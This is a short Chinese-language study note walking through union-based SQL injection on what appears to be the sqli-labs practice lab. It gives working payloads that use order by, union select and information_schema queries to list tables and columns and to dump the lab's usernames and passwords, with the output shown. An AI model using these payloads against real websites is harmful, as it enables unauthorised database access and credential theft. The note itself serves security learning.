提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
前言
SQL注入学习记录
一、步骤
1.找注入点
Load URL后加?id=1,再EXECUTE得
2.判断闭合方式
尝试加一串字母发现页面报错,应该是数字型
3.判断漏洞是否存在
and 1 正常显示and 0无显示,说明人为可控,漏洞存在
4.判断列数
order by判断列数,用二分法确定最后列数为3
5.判断回显位
id=1’ union select 1,2,3无回显,因为union左边的语句有结果直接返回左边的结果改为id=0’ union select 1,2,3
6.查询数据库名,表名,列名,元素
查数据库名
?id=0’ union select 1,database(),3 --+
数据库名:security
查表名
?id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 --+
表名:emails,referers,uagents,users
查列名
?id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘users’),3 --+
列名:id,username,password
查元素
?id=0 union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+
username中元素:
Dumb,Angelina,Dummy,secure,stupid,superman,batman,admin,admin1,admin2,admin3,dhakkan,admin4
password中元素:
Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,admin1,admin2,admin3,dumbo,admin4